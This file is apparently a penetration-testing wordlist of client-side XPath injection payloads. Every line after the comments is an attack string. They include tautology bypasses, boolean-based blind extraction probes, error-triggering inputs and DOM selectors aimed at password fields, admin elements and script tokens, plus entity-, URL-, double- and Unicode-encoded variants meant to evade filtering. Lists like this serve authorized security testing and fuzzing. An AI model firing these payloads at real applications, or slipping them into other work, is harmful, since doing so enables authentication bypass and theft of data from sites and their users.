# Client-side XPath Injection Payloads
# These payloads are designed for DOM-based XPath injection attacks

# Basic DOM XPath injection
' or '1'='1
" or "1"="1
') or ('1'='1
' or ''='

# Fragment-based payloads (for URL hash injection)
#' or '1'='1
#" or "1"="1
#') or 1=1 or ('

# JavaScript XPath function injection
count(/child::node())
string-length('test')
name(/*)
local-name(/*)
namespace-uri(/*)

# XPath axis injection for DOM traversal
ancestor::node()
descendant::node()
following::node()
preceding::node()
child::node()
parent::node()

# Boolean-based blind XPath for client-side
' and count(/*)>0 and '1'='1
' and string-length(name(/*[1]))>0 and '1'='1
' and substring(name(/*[1]),1,1)='r' and '1'='1

# DOM-specific XPath expressions
//div[@id='admin']
//input[@type='password']
//*[@class='sensitive']
//script[contains(text(),'token')]

# Client-side error generation
' and doc('non-existent.xml') and '1'='1
' and document('') and '1'='1
' and unparsed-entity-uri('') and '1'='1

# XPath injection with HTML entity encoding
&#39; or &#39;1&#39;=&#39;1
&#34; or &#34;1&#34;=&#34;1

# URL-encoded payloads
%27%20or%20%271%27%3D%271
%22%20or%20%221%22%3D%221

# Double-encoded payloads
%2527%20or%20%25271%2527%253D%25271

# JavaScript escape sequences
\' or \'1\'=\'1
\" or \"1\"=\"1

# Unicode escape sequences
\u0027 or \u00271\u0027=\u00271
\u0022 or \u00221\u0022=\u00221
